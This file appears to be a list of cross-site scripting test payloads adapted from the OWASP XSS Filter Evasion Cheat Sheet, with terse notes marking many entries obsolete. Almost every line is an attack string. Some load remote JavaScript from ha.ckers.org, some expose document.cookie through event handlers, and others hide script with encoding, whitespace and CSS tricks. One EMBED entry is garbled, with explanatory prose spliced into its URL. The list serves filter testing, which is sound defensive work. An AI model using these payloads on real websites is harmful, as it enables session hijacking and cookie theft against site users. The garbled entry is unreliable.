https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet based on the RSnake original http://ha.ckers.org/xss.html Retrieved on 2013-11-20 Much of this wildly obsolete
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
nickg; Unable to replicate in FF,Safari,Chrome 2014-01-10
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
obsolete?
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="/" onerror=javascript:alert('XSS')>
obsolete
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="/x" onerror=javascript:alert('XSS')>
obsolete form
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="/" onerror=javascript:alert('XSS')>
obsolete form
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="/x" onerror="jav ascript:alert('XSS');">
obsolete form
<IMG SRC="/" onerror="jav	ascript:alert('XSS');">
obsolete form
<IMG SRC="jav
ascript:alert('XSS');">
obsolete form
<IMG SRC="/x" onerror="jav
ascript:alert('XSS');">
obsolete form
<IMG SRC="/x" onerror="jav%00ascript:alert('XSS');">
obsolete form
<IMG SRC="/x" onerror="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
N/A
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
Wildly obsolete
<IMG DYNSRC="javascript:alert('XSS')">
Wildy obsolete
<IMG LOWSRC="javascript:alert('XSS')">
likely obsolete
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
Obsolete
<BGSOUND SRC="javascript:alert('XSS');"
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE><IMG STYLE="xss:expr/XSS/ession(alert('XSS'))"
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>"Downlevel-hidden block"
<EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:org/xss.swf" AllowScriptAccess="always">
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>